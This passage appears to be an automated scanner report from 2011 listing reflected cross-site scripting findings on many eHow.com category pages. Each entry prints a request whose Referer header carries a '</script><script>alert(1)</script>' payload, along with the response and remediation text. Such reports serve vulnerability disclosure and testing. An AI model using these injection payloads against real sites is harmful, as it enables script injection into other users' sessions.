Referer: http://www.google.com/search?hl=en&q=64203</script><script>alert(1)</script>24a7a2730b1
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75713
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Careers - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e0af</script><script>alert(1)</script>80dc93282ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cars/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5e0af</script><script>alert(1)</script>80dc93282ee
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70774
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Cars - How To Information | eHow.com</title> < ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede99</script><script>alert(1)</script>0bc15203d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /community.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ede99</script><script>alert(1)</script>0bc15203d14
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31319
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36b44</script><script>alert(1)</script>88e1c6f7fbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computer-software/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=36b44</script><script>alert(1)</script>88e1c6f7fbf
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73075
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computer Software - How To Information | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 612c9</script><script>alert(1)</script>c3e385f1396 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computers/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=612c9</script><script>alert(1)</script>c3e385f1396
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75195
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computers - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6b00</script><script>alert(1)</script>a19869a9edb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture-and-society/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e6b00</script><script>alert(1)</script>a19869a9edb
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72106
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Culture & Society - How To Information | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc5a</script><script>alert(1)</script>37e4ac73692 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diseases-and-conditions/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ccc5a</script><script>alert(1)</script>37e4ac73692
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71359
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Diseases & Conditions - How To Information | eHow ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f49e</script><script>alert(1)</script>3e4e9a8c938 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /drugs-and-supplements/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7f49e</script><script>alert(1)</script>3e4e9a8c938
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72768
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Drugs & Supplements - How To Information | eHow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db7f</script><script>alert(1)</script>d6aab24c643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4db7f</script><script>alert(1)</script>d6aab24c643
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75196
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Education - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca2a5</script><script>alert(1)</script>f5705aabf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-family/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ca2a5</script><script>alert(1)</script>f5705aabf2
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45090
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7388</script><script>alert(1)</script>20d2e506214 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-food/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b7388</script><script>alert(1)</script>20d2e506214
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46152
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea496</script><script>alert(1)</script>4ae4d3fc73d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ea496</script><script>alert(1)</script>4ae4d3fc73d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43325
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e7b4</script><script>alert(1)</script>d1b2f931b9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-home/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4e7b4</script><script>alert(1)</script>d1b2f931b9c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45118
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e797</script><script>alert(1)</script>6668a22c52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-mobile.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9e797</script><script>alert(1)</script>6668a22c52
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24864
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow Mobile | "How to do Almost Everything" by Ce ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8810</script><script>alert(1)</script>75cdd571dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-money/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a8810</script><script>alert(1)</script>75cdd571dc
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46804
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1092</script><script>alert(1)</script>7a563d731ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-style/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b1092</script><script>alert(1)</script>7a563d731ac
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45321
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2780c</script><script>alert(1)</script>12a8c6bf20b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-tax-time/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2780c</script><script>alert(1)</script>12a8c6bf20b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43203
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44044</script><script>alert(1)</script>01615995bf6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
